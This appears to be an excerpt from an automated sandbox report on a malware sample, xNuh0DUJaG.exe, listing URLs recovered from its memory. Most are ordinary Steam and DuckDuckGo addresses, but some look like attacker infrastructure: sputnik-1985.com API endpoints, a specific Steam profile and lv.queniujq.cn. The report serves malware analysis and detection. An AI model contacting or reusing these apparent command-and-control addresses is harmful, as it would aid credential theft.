            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=JWHwHdDIz5WW&l=e
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xNuh0DUJaG.exe, 00000003.00000003.1321652725.0000000003046000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321567561.0000000003049000.00000004.00000800.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1321757689.0000000003046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiOSCz
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000568000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apie
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apieB
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304472180.000000000054F000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541782028.000000000019A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304472180.000000000054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900419R
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
            Source: xNuh0DUJaG.exe, 00000003.00000003.1305176667.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1305473215.0000000000579000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294407878.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304472180.0000000000548000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
            Source: xNuh0DUJaG.exe, 00000003.00000003.1304120126.00000000005CF000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1294360681.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, xNuh0DUJaG.exe, 00000003.00000003.1304368408.00000000005CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
